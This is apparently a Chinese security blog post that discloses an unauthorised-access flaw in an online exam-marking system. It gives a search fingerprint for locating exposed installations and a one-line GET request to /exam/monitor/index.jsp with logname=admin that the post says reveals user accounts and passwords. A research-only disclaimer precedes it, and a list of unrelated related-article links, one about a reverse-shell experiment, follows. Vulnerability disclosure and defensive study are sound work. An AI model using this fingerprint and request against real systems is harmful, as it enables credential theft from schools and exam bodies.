【POC漏洞】XXX网上阅卷系统 monitor 未授权访问

*免责声明:本文仅供安全研究与学习之用,严禁使用本内容进行未经授权的违规渗透测试,遵守网络安全法,共同维护网络安全,违者后果自负。


一、漏洞说明

XXX网上阅卷系统是一款专为教育领域设计的在线阅卷工具,它能够帮助教师和考试机构实现高效、准确的试卷评阅。系统/exam/monitor/index,jsp存在未授权访问,远程攻击者可通过该接口获取用户账号与密码,造成信息泄露。

二、资产识别

资产特征:

复制代码
body="action=\"login_ok.jsp" && body="阅卷"

三、漏洞脚本

复制漏洞脚本:

复制代码
GET /exam/monitor/index.jsp?logname=admin  HTTP/1.1

漏洞效果:

相关推荐
C_心欲无痕1 天前
前端实现水印的两种方式:SVG 与 Canvas
前端·安全·水印
Godspeed Zhao1 天前
现代智能汽车中的无线技术25——Wi-Fi(13)
网络·汽车·智能路由器·信息与通信
Bruce_Liuxiaowei1 天前
基于HTA的Meterpreter反向Shell攻击实验
网络·windows·经验分享·网络安全·渗透测试
一三检测冯野180212918131 天前
贴合NMPA注册 GB/T5398-2016助力医药包装运输安全
安全·模拟运输测试·包装运输测试·包装振动测试·环境试验·包装跌落测试
Dreamboat¿1 天前
解析PHP安全漏洞:Phar反序列化、Filter链与文件包含的高级利用与防御
android·网络·php
laplace01231 天前
第七章 构建自己的agent智能体框架
网络·人工智能·microsoft·agent
北邮刘老师1 天前
A3C Network:智能体互联网的层次化视图
运维·服务器·网络
天天睡大觉1 天前
Python学习11
网络·python·学习
XRJ040618xrj1 天前
如何在Linux中根据物理网卡建立虚拟网卡
linux·服务器·网络
Le_ee1 天前
dc4打靶报告
运维·服务器·网络